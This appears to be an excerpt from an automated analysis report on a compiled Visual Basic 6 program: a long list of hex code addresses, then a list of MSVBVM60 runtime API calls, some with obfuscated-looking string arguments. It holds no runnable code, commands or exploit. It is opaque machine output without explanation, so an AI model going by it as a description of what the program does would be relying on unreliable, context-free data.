0x00412ef4
0x00412efc
0x00412f17
0x00412f1a
0x00412f1c
0x00412f29
0x00412f4b
0x00412f2b
0x00412f2b
0x00412f2d
0x00412f32
0x00412f38
0x00412f3e
0x00412f43
0x00412f43
0x00412f58
0x00412f75
0x00412f78
0x00412f7a
0x00412f87
0x00412fa9
0x00412f89
0x00412f89
0x00412f8b
0x00412f90
0x00412f96
0x00412f9c
0x00412fa1
0x00412fa1
0x00412fb7
0x00412fc4
0x00412fc4
0x00412fc9
0x00412fd3
0x00412fdf
0x00412fe0
0x00412fed
0x00412fee
0x00412fef
0x00412ff0
0x00412ff1
0x00412ff6
0x00412ffb
0x00413000
0x0041300d
0x00413012
0x00413013
0x00413015
0x0041301c
0x00413022
0x00413029
0x0041302f
0x0041303b
0x0041303d
0x0041303f
0x00413049
0x00413053
0x0041305d
0x00413067
0x0041306a
0x00413077
0x00413078
0x00413079
0x0041307a
0x0041307b
0x0041307e
0x0041308b
0x0041308c
0x0041308d
0x0041308e
0x0041308f
0x00413091
0x00413096
0x0041309c
0x004130a1
0x004130a1
0x004130a4
0x004130ae
0x004130b8
0x004130c2
0x004130d2
0x004130d9
0x004130da
0x004130dc
0x004130dd
0x004130de
0x004130e1
0x004130e3
0x004130e4
0x004130e5
0x004130e8
0x004130ea
0x004130eb
0x004130ec
0x004130ef
0x004130f4
0x004130f9
0x004130ff
0x00413101
0x00413102
0x00413110
0x00413104
0x00413104
0x00413104
0x0041311f
0x0041312c
0x00413133
0x00413134
0x00413136
0x0041313b
0x00413147
0x00413154
0x00413171
0x00413156
0x00413156
0x0041315b
0x00413160
0x00413165
0x00413165
0x00413195
0x0041319c
0x004131a1
0x004131bc
0x004131c2
0x004131c4
0x004131d1
0x004131f6
0x004131d3
0x004131d3
0x004131d8
0x004131dd
0x004131e3
0x004131e9
0x004131ee
0x004131ee
0x00413204
0x00413221
0x00413206
0x00413206
0x0041320b
0x00413210
0x00413215
0x00413215
0x0041323b
0x00413245
0x0041324c
0x00413251
0x0041326c
0x00413272
0x00413274
0x00413281
0x004132a6
0x00413283
0x00413283
0x00413288
0x0041328d
0x00413293
0x00413299
0x0041329e
0x0041329e
0x004132b7
0x004132be
0x004132c3
0x004132cc
0x004132d2
0x004132d9
0x004132de
0x004132e4
0x004132ea
0x004132f7
0x004132fa
0x00413301
0x00413304
0x0041330a
0x00413317
0x00413321
0x0041332e
0x00413334
0x00413336
0x00413343
0x00413365
0x00413345
0x00413345
0x0041334a
0x0041334f
0x00413352
0x00413358
0x0041335d
0x0041335d
0x00413372
0x00413379
0x00413380
0x00413381
0x00413383
0x00413388
0x00413391
0x00413391
0x0041339d
0x004133ba
0x0041339f
0x0041339f
0x004133a4
0x004133a9
0x004133ae
0x004133ae
0x004133de
0x004133e5
0x004133ea
0x00413405
0x0041340b
0x0041340d
0x0041341a
0x0041343f
0x0041341c
0x0041341c
0x00413421
0x00413426
0x0041342c
0x00413432
0x00413437
0x00413437
0x00413446
0x00413450
0x00413460
0x00413466
0x00413479
0x0041349e
0x004134aa
0x004134b5
0x004134c1
0x004134de
0x004134c3
0x004134c3
0x004134c8
0x004134cd
0x004134d2
0x004134d2
0x004134e8
0x004134f0
0x0041350b
0x0041350e
0x00413510
0x0041351d
0x0041353f
0x0041351f
0x0041351f
0x00413521
0x00413526
0x0041352c
0x00413532
0x00413537
0x00413537
0x0041354c
0x00413567
0x0041356d
0x0041356f
0x0041357c
0x004135a1
0x0041357e
0x0041357e
0x00413583
0x00413588
0x0041358e
0x00413594
0x00413599
0x00413599
0x004135ae
0x004135b4
0x004135c4
0x004135c9
0x004135cf
0x004135d4
0x004135de
0x004135e8
0x004135f2
0x004135fc
0x00413606
0x00413616
0x0041361d
0x00413624
0x00413625
0x0041362b
0x0041362c
0x0041362d
0x00413630
0x00413632
0x00413633
0x00413634
0x00413637
0x00413639
0x0041363a
0x0041363b
0x0041363e
0x00413643
0x0041364c
0x00413653
0x0041365a
0x0041365b
0x0041365d
0x00413662
0x00413665
0x0041366f
0x00413679
0x0041367f
0x00413680
0x00413688
0x0041368e
0x0041369b
0x004136a0
0x004136a9
0x004136ab
0x004136ad
0x004136b5
0x004136b5
0x004136bf
0x004136dc
0x004136c1
0x004136c1
0x004136c6
0x004136cb
0x004136d0
0x004136d0
0x00413700
0x00413707
0x0041370c
0x00413727
0x0041372d
0x0041372f
0x0041373c
0x00413761
0x0041373e
0x0041373e
0x00413743
0x00413748
0x0041374e
0x00413754
0x00413759
0x00413759
0x0041376f
0x0041378c
0x00413771
0x00413771
0x00413776
0x0041377b
0x00413780
0x00413780
0x004137b0
0x004137b7
0x004137bc
0x004137d7
0x004137da
0x004137dc
0x004137e9
0x0041380b
0x004137eb
0x004137eb
0x004137ed
0x004137f2
0x004137f8
0x004137fe
0x00413803
0x00413803
0x00413819
0x00413836
0x0041381b
0x0041381b
0x00413820
0x00413825
0x0041382a
0x0041382a
0x0041385a
0x00413861
0x00413866
0x00413881
0x00413887
0x00413889
0x00413896
0x004138bb
0x00413898
0x00413898
0x0041389d
0x004138a2
0x004138a8
0x004138ae
0x004138b3
0x004138b3
0x004138c9
0x004138e6
0x004138cb
0x004138cb
0x004138d0
0x004138d5
0x004138da
0x004138da
0x0041390a
0x00413911
0x00413916
0x00413931
0x00413937
0x00413939
0x00413946
0x0041396b
0x00413948
0x00413948
0x0041394d
0x00413952
0x00413958
0x0041395e
0x00413963
0x00413963
0x00413978
0x0041397e
0x0041398b
0x00413991
0x00413996
0x004139a0
0x004139b0
0x004139b6
0x004139e6
0x004139f8
0x00413a14
0x00413a20
0x00413a29
0x00413a34
0x00413a3b
0x00413a42
0x00413a43
0x00413a49
0x00413a4a
0x00413a4c
0x00413a51
0x00413a54
0x00413a56
0x00413a60
0x00413a6f
0x00413a75
0x00413a77
0x00413a84
0x00413aa6
0x00413a86
0x00413a86
0x00413a8b
0x00413a90
0x00413a93
0x00413a99
0x00413a9e
0x00413a9e
0x00413a84
0x00413ab7
0x00413abd
0x00413abf
0x00413acc
0x00413aee
0x00413ace
0x00413ace
0x00413ad3
0x00413ad8
0x00413adb
0x00413ae1
0x00413ae6
0x00413ae6
0x00413b04
0x00413b0a
0x00413b0c
0x00413b19
0x00413b3b
0x00413b1b
0x00413b1b
0x00413b20
0x00413b25
0x00413b28
0x00413b2e
0x00413b33
0x00413b33
0x00413b42
0x00413b4d
0x00413b4f
0x00413b51
0x00413b56
0x00413b56
0x00413b63
0x00413b80
0x00413b65
0x00413b65
0x00413b6a
0x00413b6f
0x00413b74
0x00413b74
0x00413ba4
0x00413bab
0x00413bb0
0x00413bc4
0x00413bca
0x00413bcc
0x00413bd9
0x00413bfe
0x00413bdb
0x00413bdb
0x00413be0
0x00413be5
0x00413beb
0x00413bf1
0x00413bf6
0x00413bf6
0x00413c0b
0x00413c18
0x00413c1e
0x00413c20
0x00413c2d
0x00413c4f
0x00413c2f
0x00413c2f
0x00413c34
0x00413c39
0x00413c3c
0x00413c42
0x00413c47
0x00413c47
0x00413c56
0x00413c60
0x00413c6a
0x00413c7c
0x00413c92
0x00413caf
0x00413c94
0x00413c94
0x00413c99
0x00413c9e
0x00413ca3
0x00413ca3
0x00413cd3
0x00413cda
0x00413cdf
0x00413cfa
0x00413d00
0x00413d02
0x00413d0f
0x00413d34
0x00413d11
0x00413d11
0x00413d16
0x00413d1b
0x00413d21
0x00413d27
0x00413d2c
0x00413d2c
0x00413d4c
0x00413d5f
0x00413d64
0x00413d6d
0x00413d74
0x00413d79
0x00413d8b
0x00413db5
0x00413dc1
0x00413dcc
0x00413dd3
0x00413dd4
0x00413dd6
0x00413de4
0x00413de9
0x00413df3
0x00413e09
0x00413e14
0x00413e1b
0x00413e1c
0x00413e21
0x00413e2b
0x00413e3b
0x00413e3c
0x00413e42
0x00413e43
0x00413e48
0x00413e55
0x00413e5c
0x00413e5d
0x00413e5f
0x00413e64
0x00413e67
0x00413e70
0x00413e7d
0x00413e9a
0x00413e7f
0x00413e7f
0x00413e84
0x00413e89
0x00413e8e
0x00413e8e
0x00413ea4
0x00413eac
0x00413ec7
0x00413eca
0x00413ecc
0x00413ed9
0x00413efb
0x00413edb
0x00413edb
0x00413edd
0x00413ee2
0x00413ee8
0x00413eee
0x00413ef3
0x00413ef3
0x00413f08
0x00413f2d
0x00413f30
0x00413f32
0x00413f3f
0x00413f61
0x00413f41
0x00413f41
0x00413f43
0x00413f48
0x00413f4e
0x00413f54
0x00413f59
0x00413f59
0x00413f68
0x00413f6e
0x00413f74
0x00413f84
0x00413f8f
0x00413f8f
0x00413f94
0x00413f96
0x00413f9b
0x00413fa0
0x00413fa2
0x00413faa
0x00413fb4
0x00413fba
0x00413fc7
0x00413fe9
0x00413fc9
0x00413fc9
0x00413fce
0x00413fd3
0x00413fd6
0x00413fdc
0x00413fe1
0x00413fe1
0x00413fc7
0x00413ff0
0x00413ff5
0x00414002
0x00414007
0x00414008
0x0041400d
0x00414014
0x0041401a
0x00414027
0x00414035
0x0041403e
0x00414044
0x00414055
0x00414072
0x00414057
0x00414057
0x0041405c
0x00414061
0x00414066
0x00414066
0x00414096
0x00414096
0x0041409d
0x004140a2
0x004140bd
0x004140c3
0x004140c5
0x004140d2
0x004140f7
0x004140d4
0x004140d4
0x004140d9
0x004140de
0x004140e4
0x004140ea
0x004140ef
0x004140ef
0x00414104
0x0041410a
0x00414117
0x0041411d
0x00414127
0x00414131
0x0041413b
0x0041413e
0x0041414b
0x0041414c
0x0041414d
0x0041414e
0x0041414f
0x00414152
0x0041415f
0x00414160
0x00414161
0x00414162
0x00414163
0x00414166
0x00414173
0x00414174
0x00414175
0x00414176
0x00414177
0x00414179
0x0041417e
0x00414181
0x00414186
0x0041418f
0x0041419a
0x0041419a
0x004141a6
0x004141c3
0x004141a8
0x004141a8
0x004141ad
0x004141b2
0x004141b7
0x004141b7
0x004141e7
0x004141e7
0x004141ee
0x004141f3
0x0041420e
0x00414214
0x00414216
0x00414223
0x00414248
0x00414225
0x00414225
0x0041422a
0x0041422f
0x00414235
0x0041423b
0x00414240
0x00414240
0x00414256
0x00414273
0x00414258
0x00414258
0x0041425d
0x00414262
0x00414267
0x00414267
0x00414297
0x0041429e
0x004142a3
0x004142be
0x004142c1
0x004142c3
0x004142d0
0x004142f2
0x004142d2
0x004142d2
0x004142d4
0x004142d9
0x004142df
0x004142e5
0x004142ea
0x004142ea
0x00414300
0x0041431d
0x00414302
0x00414302
0x00414307
0x0041430c
0x00414311
0x00414311
0x00414341
0x00414348
0x0041434d
0x00414368
0x0041436e
0x00414370
0x0041437d
0x004143a2
0x0041437f
0x0041437f
0x00414384
0x00414389
0x0041438f
0x00414395
0x0041439a
0x0041439a
0x004143b0
0x004143cd
0x004143b2
0x004143b2
0x004143b7
0x004143bc
0x004143c1
0x004143c1
0x004143f1
0x004143f8
0x004143fd
0x00414418
0x0041441e
0x00414420
0x0041442d
0x00414452
0x0041442f
0x0041442f
0x00414434
0x00414439
0x0041443f
0x00414445
0x0041444a
0x0041444a
0x00414459
0x0041445f
0x0041446c
0x00414473
0x00414484
0x004144c1
0x004144ce
0x004144d8
0x004144e3
0x004144ea
0x004144f1
0x004144f2
0x004144f9
0x004144fb
0x00414503
0x0041450d
0x00414517
0x00414519
0x00414521
0x00414522
0x0041452d
0x0041452e
0x00414533
0x00414539
0x0041453a
0x0041453f
0x00414544
0x00414550
0x00414557
0x00414558
0x00414563
0x0041456a
0x0041456b
0x0041456d
0x00414572
0x00414586
0x00414589
0x0041458c
0x00414591
0x00414598
0x004145ad
0x004145b3
0x004145b5
0x004145c2
0x004145e4
0x004145c4
0x004145c4
0x004145c9
0x004145ce
0x004145d1
0x004145d7
0x004145dc
0x004145dc
0x004145f2
0x0041460f
0x004145f4
0x004145f4
0x004145f9
0x004145fe
0x00414603
0x00414603
0x00414619
0x00414621
0x0041462d
0x00414633
0x00414645
0x0041464c
0x00414660
0x00414663
0x00414665
0x00414672
0x00414694
0x00414674
0x00414674
0x00414676
0x0041467b
0x00414681
0x00414687
0x0041468c
0x0041468c
0x004146a1
0x004146a1
0x004146ad
0x004146ca
0x004146af
0x004146af
0x004146b4
0x004146b9
0x004146be
0x004146be
0x004146ee
0x004146f5
0x004146fa
0x0041470e
0x00414714
0x00414716
0x00414723
0x00414748
0x00414725
0x00414725
0x0041472a
0x0041472f
0x00414735
0x0041473b
0x00414740
0x00414740
0x00414755
0x00414762
0x00414767
0x00414769
0x0041476c
0x00414779
0x0041477e
0x0041477f
0x00414784
0x0041478b
0x00414791
0x0041479e
0x004147ac
0x004147b9
0x004147d6
0x004147bb
0x004147bb
0x004147c0
0x004147c5
0x004147ca
0x004147ca
0x004147f0
0x004147fa
0x00414801
0x00414806
0x00414821
0x00414827
0x00414829
0x00414836
0x0041485b
0x00414838
0x00414838
0x0041483d
0x00414842
0x00414848
0x0041484e
0x00414853
0x00414853
0x0041486c
0x00414873
0x00414878
0x0041487c
0x00414881
0x00414887
0x0041488d
0x0041489f
0x004148ac
0x004148b7
0x004148bd
0x004148bf
0x004148cc
0x004148ee
0x004148ce
0x004148ce
0x004148d3
0x004148d8
0x004148db
0x004148e1
0x004148e6
0x004148e6
0x004148fb
0x00414902
0x00414903
0x00414905
0x0041490a
0x00414913
0x00414913
0x0041491f
0x0041493c
0x00414921
0x00414921
0x00414926
0x0041492b
0x00414930
0x00414930
0x00414960
0x00414967
0x0041496c
0x00414987
0x0041498d
0x0041498f
0x0041499c
0x004149c1
0x0041499e
0x0041499e
0x004149a3
0x004149a8
0x004149ae
0x004149b4
0x004149b9
0x004149b9
0x004149c8
0x004149ca
0x004149cc
0x004149d8
0x004149d9
0x004149de
0x004149e8
0x00414a05
0x004149ea
0x004149ea
0x004149ef
0x004149f4
0x004149f9
0x004149f9
0x00414a29
0x00414a30
0x00414a35
0x00414a50
0x00414a53
0x00414a55
0x00414a62
0x00414a84
0x00414a64
0x00414a64
0x00414a66
0x00414a6b
0x00414a71
0x00414a77
0x00414a7c
0x00414a7c
0x00414a92
0x00414a99
0x00414a9f
0x00414ab2
0x00414ac7
0x00414acf
0x00414ada
0x00414ae6
0x00414aef
0x00414af8
0x00414aff
0x00414b00
0x00414b02
0x00414b10
0x00414b17
0x00414b1e
0x00414b1f
0x00414b21
0x00414b2f
0x00414b34
0x00414b3e
0x00414b4e
0x00414b54
0x00414b5f
0x00414b66
0x00414b67
0x00414b6c
0x00414b76
0x00414b86
0x00414b87
0x00414b8d
0x00414b8e
0x00414b93
0x00414ba0
0x00414ba7
0x00414ba8
0x00414baa
0x00414baf
0x00414bbb
0x00414bc8
0x00414be5
0x00414bca
0x00414bca
0x00414bcf
0x00414bd4
0x00414bd9
0x00414bd9
0x00414c09
0x00414c10
0x00414c15
0x00414c30
0x00414c33
0x00414c35
0x00414c42
0x00414c64
0x00414c44
0x00414c44
0x00414c46
0x00414c4b
0x00414c51
0x00414c57
0x00414c5c
0x00414c5c
0x00414c71
0x00414c77
0x00414c77
0x00414c77
0x00414c84
0x00414c8a
0x00414c94
0x00414c9c
0x00414c9d
0x00414ca2
0x00414cae
0x00414cb3
0x00414cb9
0x00414cb9
0x00414cca
0x00414cd8
0x00414ce1
0x00414ce7
0x00414ced
0x00414cee
0x00414cef
0x00414cf2
0x00414cf4
0x00414cf5
0x00414cf6
0x00414cff
0x00414d00
0x00414d05
0x00414d0a
0x00414d10
0x00414d12
0x00414d13
0x00414d20
0x00414d3d
0x00414d22
0x00414d22
0x00414d27
0x00414d2c
0x00414d31
0x00414d31
0x00414d47
0x00414d4d
0x00414d4f
0x00414d65
0x00414d6b
0x00414d72
0x00414d86
0x00414d89
0x00414d8b
0x00414d98
0x00414dba
0x00414d9a
0x00414d9a
0x00414d9c
0x00414da1
0x00414da7
0x00414dad
0x00414db2
0x00414db2
0x00414dc7
0x00414dc7
0x00414dd3
0x00414df0
0x00414dd5
0x00414dd5
0x00414dda
0x00414ddf
0x00414de4
0x00414de4
0x00414e14
0x00414e1b
0x00414e20
0x00414e26
0x00414e30
0x00414e3d
0x00414e4a
0x00414e4b
0x00414e4c
0x00414e4d
0x00414e5c
0x00414e62
0x00414e64
0x00414e71
0x00414e96
0x00414e73
0x00414e73
0x00414e78
0x00414e7d
0x00414e83
0x00414e89
0x00414e8e
0x00414e8e
0x00414ea3
0x00414eb7
0x00414ebd
0x00414ebf
0x00414ecc
0x00414eee
0x00414ece
0x00414ece
0x00414ed3
0x00414ed8
0x00414edb
0x00414ee1
0x00414ee6
0x00414ee6
0x00414ef5
0x00414ef7
0x00414ef9
0x00414eff
0x00414f05
0x00414f06
0x00414f0b
0x00414f0e
0x00414f0f
0x00414f14
0x00414f1d
0x00414f28
0x00413c79
0x00413c79
0x00414f39
0x00414f56
0x00414f3b
0x00414f3b
0x00414f40
0x00414f45
0x00414f4a
0x00414f4a
0x00414f60
0x00414f68
0x00414f83
0x00414f86
0x00414f88
0x00414f95
0x00414fb7
0x00414f97
0x00414f97
0x00414f99
0x00414f9e
0x00414fa4
0x00414faa
0x00414faf
0x00414faf
0x00414fc4
0x00414fdf
0x00414fe2
0x00414fe4
0x00414ff1
0x00415013
0x00414ff3
0x00414ff3
0x00414ff5
0x00414ffa
0x00415000
0x00415006
0x0041500b
0x0041500b
0x00415029
0x00415030
0x00415035
0x00415050
0x00415056
0x00415058
0x00415065
0x0041508a
0x00415067
0x00415067
0x0041506c
0x00415071
0x00415077
0x0041507d
0x00415082
0x00415082
0x00415097
0x004150a4
0x004150ba
0x004150cf
0x004150de
0x004150e7
0x004150ef
0x004150fa
0x004150ff
0x0041510b
0x00415112
0x00415113
0x00415115
0x00415123
0x0041512a
0x00415131
0x00415138
0x0041513f
0x00415140
0x00415142
0x00415150
0x00415157
0x00415158
0x0041515e
0x0041515f
0x00415161
0x00415169

APIs

__vbaChkstk.MSVBVM60(?,00401316), ref: 00411D0D
__vbaAryConstruct2.MSVBVM60(?,0040404C,00000005,?,?,?,?,00401316), ref: 00411D4E
__vbaAryConstruct2.MSVBVM60(?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411D61
__vbaVarErrI4.MSVBVM60(?,000045F8,?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411D72
#559.MSVBVM60(00000000,?,000045F8,?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411D78
__vbaFreeVar.MSVBVM60(00000000,?,000045F8,?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411D95
__vbaNew2.MSVBVM60(00403C34,00417360,00000000,?,000045F8,?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411DBC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000001C), ref: 00411E21
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00411E68
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411EA4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 00411EEB
__vbaChkstk.MSVBVM60(00000000,?,00403CDC,00000048), ref: 00411F02
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CEC,00000060), ref: 00411F4E
__vbaFreeStr.MSVBVM60(00000000,?,00403CEC,00000060), ref: 00411F68
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00411F7D
__vbaNew2.MSVBVM60(00404410,00417010,00000000,?,000045F8,?,0040404C,00000005,?,0040404C,00000005,?,?,?,?,00401316), ref: 00411F98
__vbaObjSet.MSVBVM60(?,00000000), ref: 00411FD4
__vbaChkstk.MSVBVM60(?,00000000), ref: 00411FF6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000001B0), ref: 00412042
__vbaFreeObj.MSVBVM60(00000000,?,00403CDC,000001B0), ref: 0041205C
__vbaOnError.MSVBVM60(00000000), ref: 00412063
__vbaNew2.MSVBVM60(00404410,00417010,00000000), ref: 0041207B
__vbaObjSet.MSVBVM60(?,00000000), ref: 004120B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000000E0), ref: 00412104
__vbaNew2.MSVBVM60(00404410,00417010), ref: 0041212B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412167
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000078), ref: 004121AE
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004121D5
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412211
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000108), ref: 0041225E
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00412285
__vbaObjSet.MSVBVM60(?,00000000), ref: 004122C1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000048), ref: 00412308
__vbaNew2.MSVBVM60(00404410,00417010), ref: 0041232F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041236B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000088), ref: 004123B8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403414,00000700), ref: 0041247E
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004124AE
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,00401316), ref: 004124DB
#574.MSVBVM60(00000002), ref: 004124FE
__vbaStrMove.MSVBVM60(00000002), ref: 0041250B
__vbaStrCmp.MSVBVM60(00403D10,00000000,00000002), ref: 00412516
__vbaFreeStr.MSVBVM60(00403D10,00000000,00000002), ref: 00412530
__vbaFreeVar.MSVBVM60(00403D10,00000000,00000002), ref: 0041253B
__vbaNew2.MSVBVM60(00404410,00417010,00403D10,00000000,00000002), ref: 00412562
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041259E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000060), ref: 004125E5
__vbaNew2.MSVBVM60(00404410,00417010), ref: 0041260C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412648
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000048), ref: 0041268F
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004126B6
__vbaObjSet.MSVBVM60(?,00000000), ref: 004126F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000170), ref: 0041273F
__vbaInStr.MSVBVM60(00000000,?,?,?), ref: 0041276A
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,?,?), ref: 00412785
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004127A4
#535.MSVBVM60(00403D10,00000000,00000002), ref: 004127AC
__vbaNew2.MSVBVM60(00404410,00417010,00403D10,00000000,00000002), ref: 004127CA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412806
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,000001C4), ref: 0041284C
__vbaFreeObj.MSVBVM60(00000000,?,00403CFC,000001C4), ref: 00412866
__vbaNew2.MSVBVM60(00404410,00417010), ref: 0041287E
__vbaObjSet.MSVBVM60(?,00000000), ref: 004128BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000048), ref: 00412901
__vbaStrMove.MSVBVM60(00000000,?,00403CDC,00000048), ref: 00412934
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403414,00000704), ref: 0041297C
__vbaFreeStr.MSVBVM60(00000000,?,00403414,00000704), ref: 004129A1
__vbaFreeObj.MSVBVM60(00000000,?,00403414,00000704), ref: 004129AC
__vbaVarDup.MSVBVM60(00000000,?,00403414,00000704), ref: 004129D1
#542.MSVBVM60(?,00000002), ref: 004129E4
__vbaVarTstNe.MSVBVM60(00008002,?,?,00000002), ref: 00412A0B
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008002,?,?,00000002), ref: 00412A27
__vbaVarDup.MSVBVM60 ref: 00412A5A
#600.MSVBVM60(?,00000002), ref: 00412A68
__vbaFreeVar.MSVBVM60(?,00000002), ref: 00412A76
#683.MSVBVM60(?), ref: 00412AB4
__vbaFpR8.MSVBVM60(?), ref: 00412AB9
__vbaNew2.MSVBVM60(00403C34,00417360,?), ref: 00412AE0
__vbaCastObj.MSVBVM60(?,00403D68,VINKLDEREN), ref: 00412B16
__vbaObjSet.MSVBVM60(?,00000000,?,00403D68,VINKLDEREN), ref: 00412B23
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000040), ref: 00412B5E
__vbaFreeObj.MSVBVM60(00000000,?,00403C24,00000040), ref: 00412B78
__vbaVarDup.MSVBVM60 ref: 00412B9D
#717.MSVBVM60(?,?,00000003,00000000), ref: 00412BB4
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,00000003,00000000), ref: 00412BDB
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,00000003,00000000), ref: 00412BF7
__vbaNew2.MSVBVM60(00403C34,00417360), ref: 00412C21
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00412C54
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000010), ref: 00412C8F
__vbaFreeObj.MSVBVM60(00000000,?,00403C24,00000010), ref: 00412CA9
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00412CC1
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412CFD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,000000D8), ref: 00412D4A
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00412D71
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412DAD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000068), ref: 00412DF4
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00003FBA), ref: 00412E61
__vbaVarDup.MSVBVM60 ref: 00412E89
#557.MSVBVM60(?), ref: 00412E95
__vbaFreeVar.MSVBVM60(?), ref: 00412EB2
__vbaNew2.MSVBVM60(00403C34,00417360,?), ref: 00412ED9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,0000001C), ref: 00412F3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CEC,00000064), ref: 00412F9C
__vbaFreeObj.MSVBVM60(00000000,?,00403CEC,00000064), ref: 00412FC4
__vbaChkstk.MSVBVM60(?), ref: 00412FE0
#689.MSVBVM60(AFFIXING,ludderens,Magniumets,?), ref: 00413000
__vbaStrMove.MSVBVM60(AFFIXING,ludderens,Magniumets,?), ref: 0041300D
__vbaStrCmp.MSVBVM60(00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 00413015
__vbaFreeStr.MSVBVM60(00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 0041302F
__vbaChkstk.MSVBVM60(?,?,00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 0041306A
__vbaChkstk.MSVBVM60(?,?,00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 0041307E
__vbaLateMemCall.MSVBVM60(?,aCr7BNH7p7FLa196,00000002,?,?,00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 0041309C
#679.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 004130EF
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,00000000,00000000,AFFIXING,ludderens,Magniumets,?), ref: 004130F4
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 00413136
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00413160
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041319C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000138), ref: 004131E9
__vbaNew2.MSVBVM60(00404410,00417010), ref: 00413210
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041324C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CFC,00000178), ref: 00413299
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004132BE
__vbaFpI4.MSVBVM60 ref: 004132CC
__vbaI4Var.MSVBVM60(?,00000000), ref: 004132D9
__vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,000002C8), ref: 00413358
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00413383
__vbaFreeVar.MSVBVM60(?,?,?,00000000), ref: 00413391
__vbaNew2.MSVBVM60(00404410,00417010), ref: 004133A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004133E5
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E24,00000130), ref: 00413432
__vbaStrMove.MSVBVM60(00000000,?,00403E24,00000130), ref: 00413479
__vbaFreeStr.MSVBVM60 ref: 004134AA
__vbaFreeObj.MSVBVM60 ref: 004134B5
__vbaNew2.MSVBVM60(00403C34,00417360), ref: 004134CD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C24,00000014), ref: 00413532
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403E50,000000F8), ref: 00413594
__vbaStrMove.MSVBVM60(00000000,?,00403E50,000000F8), ref: 004135C4
__vbaFreeObj.MSVBVM60(00000000,?,00403E50,000000F8), ref: 004135CF
#680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041363E
__vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041365D
#592.MSVBVM60(00000002), ref: 00413680
__vbaFreeVar.MSVBVM60(00000002), ref: 0041369B
#571.MSVBVM60(00000019,00000002), ref: 004136AD
__vbaNew2.MSVBVM60(00404410,00417010,00000002), ref: 004136CB
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413707
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CDC,00000118), ref: 00413754
__vbaNew2.MSVBVM60(00404410,00417010), ref: 0041377B
